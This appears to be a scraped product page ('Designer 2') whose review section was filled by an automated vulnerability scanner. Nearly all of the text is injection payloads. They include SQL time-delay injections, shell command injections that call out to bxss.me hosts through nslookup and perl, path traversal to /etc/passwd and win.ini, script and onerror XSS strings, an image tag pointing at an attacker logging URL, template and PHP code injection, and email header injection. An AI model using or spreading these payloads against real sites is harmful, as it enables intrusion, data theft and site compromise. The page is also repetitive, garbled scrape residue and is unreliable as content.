$400.00 Original price was: $400.00.$360.00Current price is: $360.00.
Designer 2
Demo Demo – October 1, 2025
1
response.write(9193029*9049189)
‘+response.write(9193029*9049189)+’
lywlFvoO
“+response.write(9193029*9049189)+”
‘”
../../../../../../../../../../../../../../etc/passwd
12345′”\’\”);|]*%00{%0d%0a%bf%27’💡
<!–
../../../../../../../../../../../../../../windows/win.ini
echo uunvaz$()\ fjemyu\nz^xyu||a #’ &echo uunvaz$()\ fjemyu\nz^xyu||a #|” &echo uunvaz$()\ fjemyu\nz^xyu||a #
&echo wqhegf$()\ tthmtt\nz^xyu||a #’ &echo wqhegf$()\ tthmtt\nz^xyu||a #|” &echo wqhegf$()\ tthmtt\nz^xyu||a #
../1
|echo xfhjia$()\ wysdvk\nz^xyu||a #’ |echo xfhjia$()\ wysdvk\nz^xyu||a #|” |echo xfhjia$()\ wysdvk\nz^xyu||a #
./1
(nslookup hitzhnfdlfvxfdb91a.bxss.me||perl -e “gethostbyname(‘hitzhnfdlfvxfdb91a.bxss.me’)”)
1′”()&%IDTD(9827)
$(nslookup hitaaefdwmpghe05d5.bxss.me||perl -e “gethostbyname(‘hitaaefdwmpghe05d5.bxss.me’)”)
1&n985581=v974794
&(nslookup hitlgxtaxxqtl90b47.bxss.me||perl -e “gethostbyname(‘hitlgxtaxxqtl90b47.bxss.me’)”)&’\”`0&(nslookup hitlgxtaxxqtl90b47.bxss.me||perl -e “gethostbyname(‘hitlgxtaxxqtl90b47.bxss.me’)”)&`’
‘”()&%IDTD(9590)
1%0abcc:[email protected]
|(nslookup hithbauhfxzgea0d36.bxss.me||perl -e “gethostbyname(‘hithbauhfxzgea0d36.bxss.me’)”)
[email protected]>%0d%0abcc:[email protected]
`(nslookup hitesojqflbcn0e9f2.bxss.me||perl -e “gethostbyname(‘hitesojqflbcn0e9f2.bxss.me’)”)`
19667607
;(nslookup hitlsnnissjvw3d91a.bxss.me||perl -e “gethostbyname(‘hitlsnnissjvw3d91a.bxss.me’)”)|(nslookup hitlsnnissjvw3d91a.bxss.me||perl -e “gethostbyname(‘hitlsnnissjvw3d91a.bxss.me’)”)&(nslookup hitlsnnissjvw3d91a.bxss.me||perl -e “gethostbyname(‘hitlsnnissjvw3d91a.bxss.me’)”)
/xfs.bxss.me
acu10601%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10601
acux5850%C0%BEz1%C0%BCz2a%90bcxuca5850
${9999767+9999528}
http://bxss.me/t/xss.html?%00
)
bxss.me/t/xss.html?%00
!(()&&!|*|*|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
^(#$!@#$)(()))******
“+”A”.concat(70-3).concat(22*4).concat(117).concat(73).concat(102).concat(83)+(require”socket” Socket.gethostbyname(“hitmx”+”jqqwwuggbb8a0.bxss.me.”)[3].to_s)+”
1some_inexistent_file_with_long_name%00.jpg
<th:t="${acx}#foreach
‘+’A’.concat(70-3).concat(22*4).concat(118).concat(80).concat(118).concat(86)+(require’socket’ Socket.gethostbyname(‘hitme’+’rzseccwp62e95.bxss.me.’)[3].to_s)+’
http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt%3F.jpg
bxss.me
1}}”}}’}}1%>”%>’%>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
acx{{98991*97996}}xca
‘.gethostbyname(lc(‘hitrl’.’tciajicsbb6ab.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(122).chr(80).chr(104).chr(86).’
“.gethostbyname(lc(“hitut”.”zcmnqpbb20b3b.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(100).chr(83).chr(97).chr(70).”
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
‘;print(md5(31337));$a=’
“acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
“;print(md5(31337));$a=”
${@print(md5(31337))}
acu5484%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5484
${@print(md5(31337))}\
‘.print(md5(31337)).’
acux5072%C0%BEz1%C0%BCz2a%90bcxuca5072
1IDTD(9696)
14OTRE[!+!]
1IDTD(9695)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%44%54%44%28%39%31%38%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1IDTD(9094)
1IDTD(9272)
1″ onerror=alert(9032)>
%31%3C%53%63%52%69%50%74%20%3E%49%44%54%44%289717%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\IDTD(9624)\u003C/sCripT\u003E
1<ScRiPt>IDTD(9412)</sCripT>
1}body{acu:Expre/**/SSion(IDTD(9545))}
138434 IDTD(9783)
1IVVFL[!+!]
1<img sRc='http://attacker-9299/log.php?
1<aItOb4o<
19438″();}]9067
%31%39%32%32%32%22%28%29%3B%7D%5D%39%32%34%33
1IDTD(9026)
wtDtTKSh
1*1
1*154*149*0
(160-154-5)
1*899*894*0
(905-899-5)
1*230*225*0
(236-230-5)
-1 OR 2+139-139-1=0+0+0+1
-1 OR 3+139-139-1=0+0+0+1
if(now()=sysdate(),sleep(15),0)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
-1; waitfor delay ‘0:0:15’ —
-1); waitfor delay ‘0:0:15’ —
555
1 waitfor delay ‘0:0:15’ —
response.write(9742478*9680863)
echo jnmynm$()\ gdpsqe\nz^xyu||a #’ &echo jnmynm$()\ gdpsqe\nz^xyu||a #|” &echo jnmynm$()\ gdpsqe\nz^xyu||a #
XvxmRchN
‘+response.write(9742478*9680863)+’
&echo xhfdgj$()\ klkwul\nz^xyu||a #’ &echo xhfdgj$()\ klkwul\nz^xyu||a #|” &echo xhfdgj$()\ klkwul\nz^xyu||a #
“+response.write(9742478*9680863)+”
|echo omghbd$()\ nirgma\nz^xyu||a #’ |echo omghbd$()\ nirgma\nz^xyu||a #|” |echo omghbd$()\ nirgma\nz^xyu||a #
(nslookup hitnodsjlwajka8b8f.bxss.me||perl -e “gethostbyname(‘hitnodsjlwajka8b8f.bxss.me’)”)
$(nslookup hitafrxsfzbzsd49ec.bxss.me||perl -e “gethostbyname(‘hitafrxsfzbzsd49ec.bxss.me’)”)
../555
&(nslookup hitazppcdnplrb0c0e.bxss.me||perl -e “gethostbyname(‘hitazppcdnplrb0c0e.bxss.me’)”)&’\”`0&(nslookup hitazppcdnplrb0c0e.bxss.me||perl -e “gethostbyname(‘hitazppcdnplrb0c0e.bxss.me’)”)&`’
12345′”\’\”);|]*{ ”💡
./555
|(nslookup hitfpjfmlqphp791be.bxss.me||perl -e “gethostbyname(‘hitfpjfmlqphp791be.bxss.me’)”)
`(nslookup hitectnyajutle7439.bxss.me||perl -e “gethostbyname(‘hitectnyajutle7439.bxss.me’)”)`
;(nslookup hitmljdmbnxceaea51.bxss.me||perl -e “gethostbyname(‘hitmljdmbnxceaea51.bxss.me’)”)|(nslookup hitmljdmbnxceaea51.bxss.me||perl -e “gethostbyname(‘hitmljdmbnxceaea51.bxss.me’)”)&(nslookup hitmljdmbnxceaea51.bxss.me||perl -e “gethostbyname(‘hitmljdmbnxceaea51.bxss.me’)”)
555&n954760=v907599
555′”()&%RIHc(9046)
‘”()&%RIHc(9294)
555 bcc:[email protected]
[email protected]> bcc:[email protected]
5559435887
fzkjh5rf’; waitfor delay ‘0:0:15’ —
acu1133<s1﹥s2ʺs3ʹuca1133
${10000411+10000408}
acux2066z1z2abcxuca2066
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
1some_inexistent_file_with_long_name.jpg
http://bxss.me/t/fit.txt?.jpg
“+”A”.concat(70-3).concat(22*4).concat(101).concat(87).concat(111).concat(88)+(require”socket” Socket.gethostbyname(“hitmn”+”jldaknhk11f10.bxss.me.”)[3].to_s)+”
wp-comments-post.php
‘+’A’.concat(70-3).concat(22*4).concat(100).concat(87).concat(102).concat(73)+(require’socket’ Socket.gethostbyname(‘hitpj’+’tiwipgxtcbc8e.bxss.me.’)[3].to_s)+’
wp-comments-post.php/.
1lCd37YpO
‘.gethostbyname(lc(‘hitzl’.’mkfpzaio1a5c8.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(97).chr(88).chr(111).chr(83).’
‘”()
“.gethostbyname(lc(“hityn”.”gnupdfagbc9c5.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(104).chr(82).chr(110).chr(66).”
acu4881<s1﹥s2ʺs3ʹuca4881
-5 OR 580=(SELECT 580 FROM PG_SLEEP(15))–
response.write(9681054*9039658)
echo qfbsse$()\ tltheb\nz^xyu||a #’ &echo qfbsse$()\ tltheb\nz^xyu||a #|” &echo qfbsse$()\ tltheb\nz^xyu||a #
acux3683z1z2abcxuca3683
‘+response.write(9681054*9039658)+’
&echo sueddm$()\ gbrbyz\nz^xyu||a #’ &echo sueddm$()\ gbrbyz\nz^xyu||a #|” &echo sueddm$()\ gbrbyz\nz^xyu||a #
|echo larfkd$()\ ucypsh\nz^xyu||a #’ |echo larfkd$()\ ucypsh\nz^xyu||a #|” |echo larfkd$()\ ucypsh\nz^xyu||a #
“+response.write(9681054*9039658)+”
NSKoxXee
(nslookup hitknvljuwyzvdfc07.bxss.me||perl -e “gethostbyname(‘hitknvljuwyzvdfc07.bxss.me’)”)
$(nslookup hitrtmjediwic3d023.bxss.me||perl -e “gethostbyname(‘hitrtmjediwic3d023.bxss.me’)”)
&(nslookup hitczjllrsdhg3e19a.bxss.me||perl -e “gethostbyname(‘hitczjllrsdhg3e19a.bxss.me’)”)&’\”`0&(nslookup hitczjllrsdhg3e19a.bxss.me||perl -e “gethostbyname(‘hitczjllrsdhg3e19a.bxss.me’)”)&`’
|(nslookup hitslcbgxnnlkf6022.bxss.me||perl -e “gethostbyname(‘hitslcbgxnnlkf6022.bxss.me’)”)
`(nslookup hitxfdvjbpszu5faf3.bxss.me||perl -e “gethostbyname(‘hitxfdvjbpszu5faf3.bxss.me’)”)`
;(nslookup hitvztndfyycee1465.bxss.me||perl -e “gethostbyname(‘hitvztndfyycee1465.bxss.me’)”)|(nslookup hitvztndfyycee1465.bxss.me||perl -e “gethostbyname(‘hitvztndfyycee1465.bxss.me’)”)&(nslookup hitvztndfyycee1465.bxss.me||perl -e “gethostbyname(‘hitvztndfyycee1465.bxss.me’)”)
555′”()&%JRYV(9766)
555&n900171=v923815
‘”()&%JRYV(9050)
555RIHc(9599)
5559356326
555UO2LR[!+!]
NCkoZouj
acu4916<s1﹥s2ʺs3ʹuca4916
${9999703+10000397}
1*555
-5) OR 892=(SELECT 892 FROM PG_SLEEP(15))–
555RIHc(9095)
acux8287z1z2abcxuca8287
555*652*647*0
(1212-652-5)
“+”A”.concat(70-3).concat(22*4).concat(113).concat(72).concat(114).concat(89)+(require”socket” Socket.gethostbyname(“hitax”+”jdqeybef2aa81.bxss.me.”)[3].to_s)+”
555<ScRIpT>RIHc(9484)</sCrIpT>
‘+’A’.concat(70-3).concat(22*4).concat(112).concat(81).concat(116).concat(82)+(require’socket’ Socket.gethostbyname(‘hitrz’+’ignrhbqa21bdd.bxss.me.’)[3].to_s)+’
555*76*71*0
555RIHc(9034)
(636-76-5)
555*242*237*0
(802-242-5)
-1 OR 2+160-160-1=0+0+0+1
555RIHc(9397)
-1 OR 3+160-160-1=0+0+0+1
-1)) OR 736=(SELECT 736 FROM PG_SLEEP(15))–
acu2340<s1﹥s2ʺs3ʹuca2340
acux4243z1z2abcxuca4243
555″ onerror=alert(9450)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%52%49%48%63%289432%29%3C%2F%73%43%72%69%70%54%3E
4MLdGkZj
555\u003CScRiPt\RIHc(9969)\u003C/sCripT\u003E
555*105*100*0
‘.gethostbyname(lc(‘hitdk’.’kdyvesqh199c6.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(100).chr(67).chr(114).chr(84).’
555<ScRiPt>RIHc(9607)</sCripT>
(665-105-5)
“.gethostbyname(lc(“hitev”.”fgqcipth4dd98.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(101).chr(65).chr(97).chr(73).”
555*246*241*0
555JRYV(9238)
(806-246-5)
FKlGUGdC’ OR 336=(SELECT 336 FROM PG_SLEEP(15))–
5554KURJ[!+!]
555*887*882*0
(1447-887-5)
555JRYV(9918)
555*625*620*0
(1185-625-5)
555<ScRIpT>JRYV(9838)</sCrIpT>
-1 OR 2+146-146-1=0+0+0+1
-1 OR 3+146-146-1=0+0+0+1
555JRYV(9288)
555JRYV(9352)
response.write(9590516*9442072)
‘+response.write(9590516*9442072)+’
echo euifym$()\ mrrtqy\nz^xyu||a #’ &echo euifym$()\ mrrtqy\nz^xyu||a #|” &echo euifym$()\ mrrtqy\nz^xyu||a #
7YbTKHFj
“+response.write(9590516*9442072)+”
&echo etgogy$()\ ggbnxj\nz^xyu||a #’ &echo etgogy$()\ ggbnxj\nz^xyu||a #|” &echo etgogy$()\ ggbnxj\nz^xyu||a #
|echo ykkcvv$()\ ldqcrw\nz^xyu||a #’ |echo ykkcvv$()\ ldqcrw\nz^xyu||a #|” |echo ykkcvv$()\ ldqcrw\nz^xyu||a #
(nslookup hithwilhnemsaefb06.bxss.me||perl -e “gethostbyname(‘hithwilhnemsaefb06.bxss.me’)”)
$(nslookup hithrctnvrygp3cf1a.bxss.me||perl -e “gethostbyname(‘hithrctnvrygp3cf1a.bxss.me’)”)
&(nslookup hitahoffatinu8103e.bxss.me||perl -e “gethostbyname(‘hitahoffatinu8103e.bxss.me’)”)&’\”`0&(nslookup hitahoffatinu8103e.bxss.me||perl -e “gethostbyname(‘hitahoffatinu8103e.bxss.me’)”)&`’
Qu4xueeU’) OR 425=(SELECT 425 FROM PG_SLEEP(15))–
|(nslookup hitvfxmvxecbbf04cc.bxss.me||perl -e “gethostbyname(‘hitvfxmvxecbbf04cc.bxss.me’)”)
555}body{acu:Expre/**/SSion(RIHc(9090))}
`(nslookup hitfybzexasbda0208.bxss.me||perl -e “gethostbyname(‘hitfybzexasbda0208.bxss.me’)”)`
;(nslookup hitmhvikxmmmr9d299.bxss.me||perl -e “gethostbyname(‘hitmhvikxmmmr9d299.bxss.me’)”)|(nslookup hitmhvikxmmmr9d299.bxss.me||perl -e “gethostbyname(‘hitmhvikxmmmr9d299.bxss.me’)”)&(nslookup hitmhvikxmmmr9d299.bxss.me||perl -e “gethostbyname(‘hitmhvikxmmmr9d299.bxss.me’)”)
555′”()&%JYub(9287)
555N6LxC RIHc(9706)
‘”()&%JYub(9311)
555VMNUX[!+!]
555&n935942=v958626
5559357986
555″ onerror=alert(9809)>
acu9650<s1﹥s2ʺs3ʹuca9650
%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%52%59%56%289256%29%3C%2F%73%43%72%69%70%54%3E
555<img sRc='http://attacker-9653/log.php?
acux2176z1z2abcxuca2176
555\u003CScRiPt\JRYV(9309)\u003C/sCripT\u003E
${9999446+9999671}
555<a6YmbUH<
555<ScRiPt>JRYV(9706)</sCripT>
5559630″();}]9774
UolHGoQd’)) OR 126=(SELECT 126 FROM PG_SLEEP(15))–
%35%35%35%39%38%31%36%22%28%29%3B%7D%5D%39%39%34%35
555RIHc(9438)
“+”A”.concat(70-3).concat(22*4).concat(99).concat(81).concat(108).concat(77)+(require”socket” Socket.gethostbyname(“hitrk”+”iahvyjgsc21eb.bxss.me.”)[3].to_s)+”
‘+’A’.concat(70-3).concat(22*4).concat(117).concat(80).concat(99).concat(83)+(require’socket’ Socket.gethostbyname(‘hitib’+’wcbfwadw11e6f.bxss.me.’)[3].to_s)+’
‘.gethostbyname(lc(‘hitrn’.’iyhozpwide2be.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(117).chr(68).chr(118).chr(76).’
“.gethostbyname(lc(“hitxx”.”xiypacawc4b3a.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(111).chr(75).chr(99).chr(82).”
acu3646<s1﹥s2ʺs3ʹuca3646
acux8041z1z2abcxuca8041
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555}body{acu:Expre/**/SSion(JRYV(9332))}
555C27G1 JRYV(9796)
555CCSYF[!+!]
izg9R6rl
555JYub(9523)
555*16*11*0
555ERPYC[!+!]
(576-16-5)
555*377*372*0
555JYub(9731)
(937-377-5)
555<img sRc='http://attacker-9404/log.php?
555*504*499*0
555<ScRIpT>JYub(9563)</sCrIpT>
(1064-504-5)
1’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555<a62dLYv<
555*951*946*0
1′”
555JYub(9651)
(1511-951-5)
1%2527%2522
-1 OR 2+626-626-1=0+0+0+1
@@m3hsJ
5559895″();}]9325
-1 OR 3+626-626-1=0+0+0+1
%35%35%35%39%38%37%39%22%28%29%3B%7D%5D%39%34%38%35
555JYub(9114)
555JRYV(9961)
555″ onerror=alert(9247)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4A%59%75%62%289497%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\JYub(9150)\u003C/sCripT\u003E
555<ScRiPt>JYub(9747)</sCripT>
BEp3SIzn’; waitfor delay ‘0:0:15’ —
555}body{acu:Expre/**/SSion(JYub(9339))}
555TyYe8 JYub(9565)
555HXOXT[!+!]
-5 OR 786=(SELECT 786 FROM PG_SLEEP(15))–
555<img sRc='http://attacker-9969/log.php?
555<a8h4fIk<
XjsdOcMF’; waitfor delay ‘0:0:15’ —
5559771″();}]9720
%35%35%35%39%39%31%38%22%28%29%3B%7D%5D%39%31%31%31
-5) OR 624=(SELECT 624 FROM PG_SLEEP(15))–
555JYub(9203)
-5 OR 209=(SELECT 209 FROM PG_SLEEP(15))–
-1)) OR 674=(SELECT 674 FROM PG_SLEEP(15))–
-5) OR 267=(SELECT 267 FROM PG_SLEEP(15))–
6sKvBgni’ OR 970=(SELECT 970 FROM PG_SLEEP(15))–
-1)) OR 245=(SELECT 245 FROM PG_SLEEP(15))–
HovPvyp9′) OR 56=(SELECT 56 FROM PG_SLEEP(15))–
Your email address will not be published. Required fields are marked *
Your review *
Name *
Email *
Save my name, email, and website in this browser for the next time I comment.
Demo Demo –
1
Demo Demo –
response.write(9193029*9049189)
Demo Demo –
‘+response.write(9193029*9049189)+’
Demo Demo –
lywlFvoO
Demo Demo –
“+response.write(9193029*9049189)+”
Demo Demo –
‘”
Demo Demo –
../../../../../../../../../../../../../../etc/passwd
Demo Demo –
12345′”\’\”);|]*%00{%0d%0a%bf%27’💡
Demo Demo –
<!–
Demo Demo –
../../../../../../../../../../../../../../windows/win.ini
Demo Demo –
echo uunvaz$()\ fjemyu\nz^xyu||a #’ &echo uunvaz$()\ fjemyu\nz^xyu||a #|” &echo uunvaz$()\ fjemyu\nz^xyu||a #
Demo Demo –
&echo wqhegf$()\ tthmtt\nz^xyu||a #’ &echo wqhegf$()\ tthmtt\nz^xyu||a #|” &echo wqhegf$()\ tthmtt\nz^xyu||a #
Demo Demo –
../1
Demo Demo –
|echo xfhjia$()\ wysdvk\nz^xyu||a #’ |echo xfhjia$()\ wysdvk\nz^xyu||a #|” |echo xfhjia$()\ wysdvk\nz^xyu||a #
Demo Demo –
./1
Demo Demo –
(nslookup hitzhnfdlfvxfdb91a.bxss.me||perl -e “gethostbyname(‘hitzhnfdlfvxfdb91a.bxss.me’)”)
Demo Demo –
1′”()&%IDTD(9827)
Demo Demo –
$(nslookup hitaaefdwmpghe05d5.bxss.me||perl -e “gethostbyname(‘hitaaefdwmpghe05d5.bxss.me’)”)
Demo Demo –
1&n985581=v974794
Demo Demo –
&(nslookup hitlgxtaxxqtl90b47.bxss.me||perl -e “gethostbyname(‘hitlgxtaxxqtl90b47.bxss.me’)”)&’\”`0&(nslookup hitlgxtaxxqtl90b47.bxss.me||perl -e “gethostbyname(‘hitlgxtaxxqtl90b47.bxss.me’)”)&`’
Demo Demo –
‘”()&%IDTD(9590)
Demo Demo –
1%0abcc:[email protected]
Demo Demo –
|(nslookup hithbauhfxzgea0d36.bxss.me||perl -e “gethostbyname(‘hithbauhfxzgea0d36.bxss.me’)”)
Demo Demo –
[email protected]>%0d%0abcc:[email protected]
Demo Demo –
`(nslookup hitesojqflbcn0e9f2.bxss.me||perl -e “gethostbyname(‘hitesojqflbcn0e9f2.bxss.me’)”)`
Demo Demo –
19667607
Demo Demo –
;(nslookup hitlsnnissjvw3d91a.bxss.me||perl -e “gethostbyname(‘hitlsnnissjvw3d91a.bxss.me’)”)|(nslookup hitlsnnissjvw3d91a.bxss.me||perl -e “gethostbyname(‘hitlsnnissjvw3d91a.bxss.me’)”)&(nslookup hitlsnnissjvw3d91a.bxss.me||perl -e “gethostbyname(‘hitlsnnissjvw3d91a.bxss.me’)”)
Demo Demo –
/xfs.bxss.me
Demo Demo –
acu10601%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10601
Demo Demo –
1
Demo Demo –
acux5850%C0%BEz1%C0%BCz2a%90bcxuca5850
Demo Demo –
${9999767+9999528}
Demo Demo –
http://bxss.me/t/xss.html?%00
Demo Demo –
Demo Demo –
)
Demo Demo –
bxss.me/t/xss.html?%00
Demo Demo –
!(()&&!|*|*|
Demo Demo –
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
Demo Demo –
^(#$!@#$)(()))******
Demo Demo –
“+”A”.concat(70-3).concat(22*4).concat(117).concat(73).concat(102).concat(83)+(require”socket”
Socket.gethostbyname(“hitmx”+”jqqwwuggbb8a0.bxss.me.”)[3].to_s)+”
Demo Demo –
1some_inexistent_file_with_long_name%00.jpg
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
‘+’A’.concat(70-3).concat(22*4).concat(118).concat(80).concat(118).concat(86)+(require’socket’
Socket.gethostbyname(‘hitme’+’rzseccwp62e95.bxss.me.’)[3].to_s)+’
Demo Demo –
http://bxss.me/t/fit.txt
Demo Demo –
http://bxss.me/t/fit.txt%3F.jpg
Demo Demo –
bxss.me
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Demo Demo –
acx{{98991*97996}}xca
Demo Demo –
‘.gethostbyname(lc(‘hitrl’.’tciajicsbb6ab.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(122).chr(80).chr(104).chr(86).’
Demo Demo –
“.gethostbyname(lc(“hitut”.”zcmnqpbb20b3b.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(100).chr(83).chr(97).chr(70).”
Demo Demo –
acx[[${98991*97996}]]xca
Demo Demo –
acx__${98991*97996}__::.x
Demo Demo –
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
Demo Demo –
‘;print(md5(31337));$a=’
Demo Demo –
“acxzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
Demo Demo –
“;print(md5(31337));$a=”
Demo Demo –
${@print(md5(31337))}
Demo Demo –
acu5484%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca5484
Demo Demo –
${@print(md5(31337))}\
Demo Demo –
‘.print(md5(31337)).’
Demo Demo –
acux5072%C0%BEz1%C0%BCz2a%90bcxuca5072
Demo Demo –
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
1IDTD(9696)
Demo Demo –
14OTRE[!+!]
Demo Demo –
1IDTD(9695)
Demo Demo –
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%44%54%44%28%39%31%38%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
Demo Demo –
1IDTD(9094)
Demo Demo –
1
Demo Demo –
1IDTD(9272)
Demo Demo –
1
Demo Demo –
1
Demo Demo –
1
Demo Demo –
1
Demo Demo –
1
Demo Demo –
1
Demo Demo –
1″ onerror=alert(9032)>
Demo Demo –
%31%3C%53%63%52%69%50%74%20%3E%49%44%54%44%289717%29%3C%2F%73%43%72%69%70%54%3E
Demo Demo –
1\u003CScRiPt\IDTD(9624)\u003C/sCripT\u003E
Demo Demo –
1<ScRiPt>IDTD(9412)</sCripT>
Demo Demo –
1
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
Demo Demo –
1}body{acu:Expre/**/SSion(IDTD(9545))}
Demo Demo –
138434
IDTD(9783)
Demo Demo –
1IVVFL[!+!]
Demo Demo –
1
Demo Demo –
1
Demo Demo –
1<img sRc='http://attacker-9299/log.php?
Demo Demo –
1<aItOb4o<
Demo Demo –
19438″();}]9067
Demo Demo –
%31%39%32%32%32%22%28%29%3B%7D%5D%39%32%34%33
Demo Demo –
1IDTD(9026)
Demo Demo –
wtDtTKSh
Demo Demo –
1*1
Demo Demo –
1*154*149*0
Demo Demo –
(160-154-5)
Demo Demo –
1*899*894*0
Demo Demo –
(905-899-5)
Demo Demo –
1*230*225*0
Demo Demo –
(236-230-5)
Demo Demo –
-1 OR 2+139-139-1=0+0+0+1
Demo Demo –
-1 OR 3+139-139-1=0+0+0+1
Demo Demo –
if(now()=sysdate(),sleep(15),0)
Demo Demo –
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
Demo Demo –
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
Demo Demo –
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
Demo Demo –
-1; waitfor delay ‘0:0:15’ —
Demo Demo –
-1); waitfor delay ‘0:0:15’ —
Demo Demo –
555
Demo Demo –
1 waitfor delay ‘0:0:15’ —
Demo Demo –
response.write(9742478*9680863)
Demo Demo –
echo jnmynm$()\ gdpsqe\nz^xyu||a #’ &echo jnmynm$()\ gdpsqe\nz^xyu||a #|” &echo jnmynm$()\ gdpsqe\nz^xyu||a #
Demo Demo –
XvxmRchN
Demo Demo –
‘+response.write(9742478*9680863)+’
Demo Demo –
&echo xhfdgj$()\ klkwul\nz^xyu||a #’ &echo xhfdgj$()\ klkwul\nz^xyu||a #|” &echo xhfdgj$()\ klkwul\nz^xyu||a #
Demo Demo –
“+response.write(9742478*9680863)+”
Demo Demo –
|echo omghbd$()\ nirgma\nz^xyu||a #’ |echo omghbd$()\ nirgma\nz^xyu||a #|” |echo omghbd$()\ nirgma\nz^xyu||a #
Demo Demo –
(nslookup hitnodsjlwajka8b8f.bxss.me||perl -e “gethostbyname(‘hitnodsjlwajka8b8f.bxss.me’)”)
Demo Demo –
$(nslookup hitafrxsfzbzsd49ec.bxss.me||perl -e “gethostbyname(‘hitafrxsfzbzsd49ec.bxss.me’)”)
Demo Demo –
../555
Demo Demo –
&(nslookup hitazppcdnplrb0c0e.bxss.me||perl -e “gethostbyname(‘hitazppcdnplrb0c0e.bxss.me’)”)&’\”`0&(nslookup hitazppcdnplrb0c0e.bxss.me||perl -e “gethostbyname(‘hitazppcdnplrb0c0e.bxss.me’)”)&`’
Demo Demo –
<!–
Demo Demo –
12345′”\’\”);|]*{
”💡
Demo Demo –
./555
Demo Demo –
|(nslookup hitfpjfmlqphp791be.bxss.me||perl -e “gethostbyname(‘hitfpjfmlqphp791be.bxss.me’)”)
Demo Demo –
`(nslookup hitectnyajutle7439.bxss.me||perl -e “gethostbyname(‘hitectnyajutle7439.bxss.me’)”)`
Demo Demo –
;(nslookup hitmljdmbnxceaea51.bxss.me||perl -e “gethostbyname(‘hitmljdmbnxceaea51.bxss.me’)”)|(nslookup hitmljdmbnxceaea51.bxss.me||perl -e “gethostbyname(‘hitmljdmbnxceaea51.bxss.me’)”)&(nslookup hitmljdmbnxceaea51.bxss.me||perl -e “gethostbyname(‘hitmljdmbnxceaea51.bxss.me’)”)
Demo Demo –
555&n954760=v907599
Demo Demo –
555′”()&%RIHc(9046)
Demo Demo –
‘”()&%RIHc(9294)
Demo Demo –
555
bcc:[email protected]
Demo Demo –
[email protected]>
bcc:[email protected]
Demo Demo –
5559435887
Demo Demo –
fzkjh5rf’; waitfor delay ‘0:0:15’ —
Demo Demo –
555
Demo Demo –
acu1133<s1﹥s2ʺs3ʹuca1133
Demo Demo –
${10000411+10000408}
Demo Demo –
acux2066z1z2abcxuca2066
Demo Demo –
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Demo Demo –
1some_inexistent_file_with_long_name.jpg
Demo Demo –
!(()&&!|*|*|
Demo Demo –
http://bxss.me/t/fit.txt?.jpg
Demo Demo –
“+”A”.concat(70-3).concat(22*4).concat(101).concat(87).concat(111).concat(88)+(require”socket”
Socket.gethostbyname(“hitmn”+”jldaknhk11f10.bxss.me.”)[3].to_s)+”
Demo Demo –
wp-comments-post.php
Demo Demo –
‘+’A’.concat(70-3).concat(22*4).concat(100).concat(87).concat(102).concat(73)+(require’socket’
Socket.gethostbyname(‘hitpj’+’tiwipgxtcbc8e.bxss.me.’)[3].to_s)+’
Demo Demo –
Demo Demo –
wp-comments-post.php/.
Demo Demo –
<th:t="${acx}#foreach
Demo Demo –
1}}”}}’}}1%>”%>’%>
Demo Demo –
1lCd37YpO
Demo Demo –
‘.gethostbyname(lc(‘hitzl’.’mkfpzaio1a5c8.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(97).chr(88).chr(111).chr(83).’
Demo Demo –
‘”()
Demo Demo –
